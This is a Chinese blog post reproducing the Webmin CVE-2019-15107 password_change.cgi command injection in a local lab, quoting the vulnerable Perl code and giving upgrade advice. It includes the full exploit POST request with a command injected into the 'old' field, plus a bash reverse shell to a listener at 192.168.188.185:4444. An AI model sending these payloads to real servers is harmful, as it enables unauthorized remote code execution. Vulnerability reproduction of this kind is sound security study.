Webmin (CVE-2019-15107) 远程命令执行漏洞复现

2023-10-15 03:04

本文主要是介绍Webmin (CVE-2019-15107) 远程命令执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • Webmin 远程命令执行漏洞
    • 1. 漏洞编号
    • 2. 漏洞描述
    • 3. 影响版本
    • 4. 利用方法(利用案例)
      • 4.1 启动环境
      • 4.2 漏洞复现
      • 4.3 深度利用
      • 4.4 漏洞原因
    • 5. 附带文件
    • 6. 加固建议
    • 7. 参考信息
    • 8. 漏洞分类

Webmin 远程命令执行漏洞

1. 漏洞编号

CVE-2019-15107

2. 漏洞描述

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

3. 影响版本

漏洞影响版本为Webmin<=1.920

4. 利用方法(利用案例)

4.1 启动环境

image-20231012170055010

访问靶场地址https://127.0.0.1:10000/

image-20231012170839696

访问https://127.0.0.1:10000/password_change.cgi

image-20231012190358098

4.2 漏洞复现

可以使用bp抓包然后修改数据包的方式

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

还可以使用HackBar,发送POST请求包,并添加攻击Payload

image-20231012190637087

然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。

4.3 深度利用

尝试执行反弹shell命令

先将payload进行URL编码

bash -c "bash -i >& /dev/tcp/192.168.188.185/4444 0>&1"

image-20231012191702397

kali监听4444端口,发送数据包

image-20231012191655140

kali反弹成功

image-20231012191721087

4.4 漏洞原因

出问题的地方就是这个password_change.cgi

  1 #!/usr/bin/perl2 # password_change.cgi3 # Actually update a user's password by directly modifying /etc/shadow4 5 BEGIN { push(@INC, "."); };6 use WebminCore;7 8 $ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";9 &init_config();10 &ReadParse();11 &get_miniserv_config(\%miniserv);12 $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";13 14 # Validate inputs15 $in{'new1'} ne '' || &pass_error($text{'password_enew1'});16 $in{'new1'} eq $in{'new2'} || &pass_error($text{'password_enew2'});17 18 # Is this a Webmin user?19 if (&foreign_check("acl")) {20         &foreign_require("acl", "acl-lib.pl");21         ($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();22         if ($wuser->{'pass'} eq 'x') {23                 # A Webmin user, but using Unix authentication24                 $wuser = undef;25                 }26         elsif ($wuser->{'pass'} eq '*LK*' ||27                $wuser->{'pass'} =~ /^\!/) {28                 &pass_error("Webmin users with locked accounts cannot change ".29                             "their passwords!");30                 }31         }32 if (!$in{'pam'} && !$wuser) {33         $miniserv{'passwd_cindex'} ne '' && $miniserv{'passwd_mindex'} ne '' ||34                 die "Missing password file configuration";35         }37 if ($wuser) {38         # Update Webmin user's password39         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});40         $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);41         $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});42         $perr && &pass_error(&text('password_enewpass', $perr));43         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});44         $wuser->{'temppass'} = 0;45         &acl::modify_user($wuser->{'name'}, $wuser);46         &reload_miniserv();47         }48 elsif ($gconfig{'passwd_cmd'}) {49         # Use some configured command50         $passwd_cmd = &has_command($gconfig{'passwd_cmd'});51         $passwd_cmd || &pass_error("The password change command <tt>$gconfig{'passwd_cmd'}</tt> was not found");52 53         &foreign_require("proc", "proc-lib.pl");54         &clean_environment();55         $ENV{'REMOTE_USER'} = $in{'user'};      # some programs need this56         $passwd_cmd .= " ".quotemeta($in{'user'});57         ($fh, $fpid) = &proc::pty_process_exec($passwd_cmd, 0, 0);58         &reset_environment();59         while(1) {60                 local $rv = &wait_for($fh,61                            '(new|re-enter).*:',62                            '(old|current|login).*:',63                            'pick a password',64                            'too\s+many\s+failures',65                            'attributes\s+changed\s+on|successfully\s+changed',66                            'pick your passwords');67                 $out .= $wait_for_input;68                 sleep(1);69                 if ($rv == 0) {

5. 附带文件

6. 加固建议

漏洞修复:

  • 升级到1.930版本

  • 在github上下载password_change.cgi文件

7. 参考信息

参考信息

  • Vulhub - Docker-Compose file for vulnerability environment。

  • exploit-db.com/exploits/47230

  • Webmin 0day 远程代码执行 (firosolutions.com)

8. 漏洞分类

远程命令执行漏洞(RCE)

这篇关于Webmin (CVE-2019-15107) 远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/214950

相关文章

零基础学习Redis(10) -- zset类型命令使用

zset是有序集合,内部除了存储元素外,还会存储一个score,存储在zset中的元素会按照score的大小升序排列,不同元素的score可以重复,score相同的元素会按照元素的字典序排列。 1. zset常用命令 1.1 zadd  zadd key [NX | XX] [GT | LT]   [CH] [INCR] score member [score member ...]

30常用 Maven 命令

Maven 是一个强大的项目管理和构建工具,它广泛用于 Java 项目的依赖管理、构建流程和插件集成。Maven 的命令行工具提供了大量的命令来帮助开发人员管理项目的生命周期、依赖和插件。以下是 常用 Maven 命令的使用场景及其详细解释。 1. mvn clean 使用场景:清理项目的生成目录,通常用于删除项目中自动生成的文件(如 target/ 目录)。共性规律:清理操作

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

maven 编译构建可以执行的jar包

💝💝💝欢迎莅临我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。 推荐:「stormsha的主页」👈,「stormsha的知识库」👈持续学习,不断总结,共同进步,为了踏实,做好当下事儿~ 专栏导航 Python系列: Python面试题合集,剑指大厂Git系列: Git操作技巧GO

利用命令模式构建高效的手游后端架构

在现代手游开发中,后端架构的设计对于支持高并发、快速迭代和复杂游戏逻辑至关重要。命令模式作为一种行为设计模式,可以有效地解耦请求的发起者与接收者,提升系统的可维护性和扩展性。本文将深入探讨如何利用命令模式构建一个强大且灵活的手游后端架构。 1. 命令模式的概念与优势 命令模式通过将请求封装为对象,使得请求的发起者和接收者之间的耦合度降低。这种模式的主要优势包括: 解耦请求发起者与处理者

linux 判断某个命令是否安装

linux 判断某个命令是否安装 if ! [ -x "$(command -v git)" ]; thenecho 'Error: git is not installed.' >&2exit 1fi

jenkins 插件执行shell命令时,提示“Command not found”处理方法

首先提示找不到“Command not found,可能我们第一反应是查看目标机器是否已支持该命令,不过如果相信能找到这里来的朋友估计遇到的跟我一样,其实目标机器是没有问题的通过一些远程工具执行shell命令是可以执行。奇怪的就是通过jenkinsSSH插件无法执行,经一番折腾各种搜索发现是jenkins没有加载/etc/profile导致。 【解决办法】: 需要在jenkins调用shell脚

Lua 脚本在 Redis 中执行时的原子性以及与redis的事务的区别

在 Redis 中,Lua 脚本具有原子性是因为 Redis 保证在执行脚本时,脚本中的所有操作都会被当作一个不可分割的整体。具体来说,Redis 使用单线程的执行模型来处理命令,因此当 Lua 脚本在 Redis 中执行时,不会有其他命令打断脚本的执行过程。脚本中的所有操作都将连续执行,直到脚本执行完成后,Redis 才会继续处理其他客户端的请求。 Lua 脚本在 Redis 中原子性的原因

Linux命令(4):fg与bg命令

fg、bg、jobs、&、ctrl + z都是跟系统任务有关的,虽然现在基本上不怎么需要用到这些命令,但学会了也是很实用的 一.& 最经常被用到 这个用在一个命令的最后,可以把这个命令放到后台执行 二.ctrl + z 可以将一个正在前台执行的命令放到后台,并且暂停 三.jobs 查看当前有多少在后台运行的命令 四.fg 将后台中的命令调至前台继续运行 如果后台中有多个命令,可以

Linux命令(3):sz与rz命令

一般来说,linux服务器大多是通过ssh客户端来进行远程的登陆和管理的,使用ssh登陆linux主机以后,如何能够快速的和本地机器进行文件的交互呢,也就是上传和下载文件到服务器和本地; 与ssh有关的两个命令可以提供很方便的操作: sz:将选定的文件发送(send)到本地机器 rz:运行该命令会弹出一个文件选择窗口,从本地选择文件上传到服务器(receive) rz,sz是便是Linux